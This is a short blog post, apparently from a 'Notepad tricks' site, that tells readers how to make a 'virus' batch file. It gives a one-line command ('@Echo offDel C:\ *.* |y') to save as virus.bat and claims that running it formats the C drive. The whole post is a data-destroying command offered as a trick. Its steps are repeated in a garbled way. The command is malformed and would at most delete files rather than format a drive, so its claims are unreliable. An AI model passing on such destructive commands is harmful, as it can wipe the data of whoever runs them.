- Back to Home »
- computer tricks , Notepad Tricks »
- Creating Virus That Can Format C Drive :
Saturday, February 1, 2014
This trick is to create a virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.
1. Open Notepad and copy below code into it.
2. Then Save this file as virus.bat
3. Now, running this file will format C Drive.
1. Open Notepad and copy below code into it.
@Echo offDel C:\ *.* |y
3. Now, running this file will format C Drive.